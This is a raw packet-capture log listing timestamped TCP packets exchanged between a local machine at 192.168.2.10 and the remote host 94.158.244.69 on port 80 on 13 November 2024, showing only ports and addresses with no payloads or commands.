Nov 13, 2024 10:55:16.233179092 CET	49980	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:16.237451077 CET	80	49980	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:16.238004923 CET	80	49980	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:24.717444897 CET	80	49980	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:24.717528105 CET	49980	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:24.717600107 CET	49980	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:24.722608089 CET	80	49980	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.357961893 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.362972975 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.363049030 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.363781929 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.364300966 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.368740082 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.368814945 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369436026 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369477987 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369503975 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369528055 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369600058 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369610071 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369641066 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369656086 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369707108 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369733095 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369750977 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369767904 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369872093 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369880915 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.369906902 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.369924068 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.373486996 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.373548031 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.373673916 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.373713970 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.374401093 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.374413013 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.374423027 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.374459982 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.374459982 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.374469042 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.374480009 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.374522924 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.421624899 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.421751022 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.473714113 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.473931074 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.521570921 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.521702051 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.569506884 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.569658041 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.617587090 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.617687941 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.669580936 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.669734955 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.718055964 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.718116045 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.765491962 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.765599012 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.813616991 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.813721895 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.861489058 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.861603975 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.909486055 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.909604073 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:25.957480907 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:25.957545996 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.005619049 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.005702019 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.053498030 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.053574085 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.101702929 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.101810932 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.153624058 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.153786898 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.201627970 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.201833010 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.249597073 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.249893904 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.301723957 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.301919937 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.353576899 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.353684902 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.401546955 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.401758909 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.453568935 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.453651905 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.501596928 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.501713991 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.549520016 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.549704075 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.597537041 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.597634077 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.645643950 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.645698071 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.693629980 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.693774939 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.746100903 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.746227026 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.793684959 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.793867111 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.845578909 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.845822096 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.897521019 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.897772074 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.949466944 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.949737072 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:26.997984886 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:26.998132944 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.045494080 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.045636892 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.097775936 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.098020077 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.149609089 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.149801970 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.197606087 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.197662115 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.249557018 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.249618053 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.301543951 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.301619053 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.349692106 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.349946976 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.397507906 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.397588968 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.445667028 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.445755005 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.497561932 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.497685909 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.549511909 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.549612045 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.597692013 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.597839117 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.645535946 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.645679951 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.697627068 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.697782993 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.745585918 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.745699883 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.797557116 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.797633886 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.849558115 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.849678040 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.897562027 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.897710085 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.946156025 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.946341991 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:27.998779058 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:27.998904943 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.047810078 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.047982931 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.093823910 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.093964100 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.141730070 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.141865969 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.189609051 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.189719915 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.237754107 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.237879992 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.285633087 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.285754919 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.337539911 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.337622881 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.385521889 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.385590076 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.433517933 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.433661938 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.481518030 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.481616974 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.529721022 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.529898882 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.581545115 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.581702948 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.629610062 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.629786968 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.677651882 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.677763939 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.725570917 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.725668907 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.777748108 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.777862072 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.825558901 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.825647116 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.873655081 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.873774052 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.925798893 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.925868034 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:28.973591089 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:28.973665953 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.021632910 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.021765947 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.069597006 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.070020914 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.121649027 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.121814013 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.173634052 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.173736095 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.221625090 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.221775055 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.269562960 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.269676924 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.317881107 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.318270922 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.369513988 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.369595051 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.417531967 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.417584896 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.465636015 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.465743065 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.513565063 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.513626099 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.561593056 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.561662912 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.609766960 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.609824896 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.657625914 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.657736063 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.705847025 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.706048965 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.753840923 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.755393028 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.801661015 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.803400993 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.849706888 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.851438999 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.897555113 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.899399042 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.949599028 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.951394081 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:29.997431993 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:29.999375105 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.045649052 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.047411919 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.093699932 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.094752073 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.145577908 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.147403002 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.193720102 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.193837881 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.241646051 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.242516994 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.293595076 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.293678999 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.345571995 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.345808029 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.393574953 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.393743038 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.441515923 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.441653013 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.489501953 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.489675045 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.537549973 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.537722111 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.589668036 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.589765072 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.637835026 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.637939930 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.685674906 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.685802937 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.733679056 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.733756065 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.789901972 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.790014029 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.837645054 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.837714911 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.889801979 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.889878035 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.941869974 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.942017078 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:30.989785910 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:30.990056992 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.037842035 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.037935019 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.085829020 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.085943937 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.133959055 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.134076118 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.181607962 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.181668043 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.233613014 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.233908892 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.281589985 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.281745911 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.329664946 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.329827070 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.377814054 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.377969027 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.425746918 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.425831079 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.475842953 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.475905895 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.521588087 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.521651983 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.569926023 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.570019007 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.617650986 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.617774963 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.665755033 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.665899992 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.717968941 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.718135118 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.769988060 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.770083904 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.817600012 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.817738056 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.865868092 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.865991116 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.913594961 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.913806915 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:31.961754084 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:31.961905003 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.010041952 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.010135889 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.065828085 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.065923929 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.117794037 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.117851019 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.169533014 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.169755936 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.221815109 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.221867085 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.273705959 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.273788929 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.329741955 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.329879999 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.377785921 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.377907038 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.426245928 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.426362038 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.478573084 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.478705883 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.526088953 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.526251078 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.574214935 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.574376106 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.623308897 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.623529911 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.675525904 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.675668001 CET	49981	80	192.168.2.10	94.158.244.69
Nov 13, 2024 10:55:32.727252007 CET	80	49981	94.158.244.69	192.168.2.10
Nov 13, 2024 10:55:32.727317095 CET	49981	80	192.168.2.10	94.158.244.69
